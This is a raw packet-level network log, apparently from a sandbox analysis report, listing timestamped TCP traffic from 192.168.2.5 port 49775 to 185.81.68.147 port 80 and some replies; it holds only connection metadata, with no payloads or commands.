Dec 13, 2024 01:37:36.109658003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.109682083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.109700918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.109716892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.109786034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.109816074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.109842062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.109873056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.109899998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.109970093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.109988928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110013962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110033035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110058069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110071898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110094070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110114098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110138893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110157967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110177040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110191107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110215902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110239029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110254049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110276937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110299110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110320091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110340118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110356092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110378027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110392094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110414982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110429049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110455990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110474110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110505104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110518932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110543966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110559940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110584021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110596895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110622883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110647917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110661983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110682011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110694885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110717058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110744953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110765934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110783100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110804081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110817909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110845089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110902071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110918045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110939026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110953093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110980034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.110994101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111015081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111030102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111053944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111078024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111095905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111115932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111136913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111145973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111175060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111190081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111212969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111228943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111253977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111274958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111293077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111320972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111337900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111352921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111373901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111398935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111413002 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111429930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111444950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111470938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111504078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111520052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111541986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111555099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111584902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111599922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111618996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111669064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111669064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111685991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111706972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111721039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111751080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111763954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111793995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111814022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111835003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111848116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111871958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111895084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111910105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111938953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111953020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111977100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.111996889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112020016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112082958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112109900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112135887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112162113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112194061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112273932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112287998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112313032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112341881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112358093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112385035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112400055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112421036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112447023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112472057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112485886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112504959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112519979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112548113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112565041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112596989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112617016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112617016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112644911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112659931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112684011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112698078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112716913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112737894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112756014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112780094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112796068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112816095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112842083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112857103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112886906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112900972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112921953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112952948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112972975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.112987995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113010883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113027096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113051891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113065958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113092899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113109112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113128901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113145113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113172054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113226891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113244057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113266945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113291979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113307953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113328934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113343954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113363028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113385916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113399029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113420963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113435984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113456011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113475084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113500118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113513947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113535881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113549948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113583088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113598108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113620043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113634109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113656044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113679886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113694906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113715887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113729954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113749027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113770008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113794088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113810062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113831997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113845110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113873005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113887072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113908052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113922119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113945007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113969088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.113985062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114010096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114022970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114043951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114073038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114188910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114303112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114329100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114367008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114396095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114412069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114438057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114449024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114459991 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.114478111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114506960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114521980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114550114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114737988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114763975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114787102 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.114794016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114818096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114840031 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.114846945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114851952 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.114860058 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.114866972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114875078 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.114919901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114931107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114958048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.114981890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115008116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115035057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115051031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115073919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115087032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115118980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115134954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115163088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115180016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115250111 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115257025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115262985 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115277052 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115283966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115291119 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115298986 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115336895 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115345001 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115351915 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115370989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115396976 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115406036 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115412951 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115421057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115469933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115492105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115509033 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115514040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115518093 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115525961 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115535021 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115536928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115542889 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115580082 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115587950 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.115632057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115649939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115668058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115689039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115715027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115745068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115895987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115945101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115961075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.115988016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116022110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116039038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116060972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116074085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116099119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116113901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116136074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116148949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116168976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116183996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116206884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116219997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116240978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116255045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116276979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116293907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116322994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116336107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116359949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116373062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116389990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116404057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116429090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116444111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116466999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116483927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116508961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116523027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116542101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116555929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116579056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116595030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116620064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116635084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116657972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116668940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116693974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116751909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116767883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116794109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116810083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116832972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116846085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116869926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116889954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116918087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116930962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116951942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116966009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.116990089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117003918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117018938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117033005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117053032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117069006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117089987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117104053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117132902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117156982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117170095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117192984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117207050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117223024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117237091 CET	49775	80	192.168.2.5	185.81.68.147
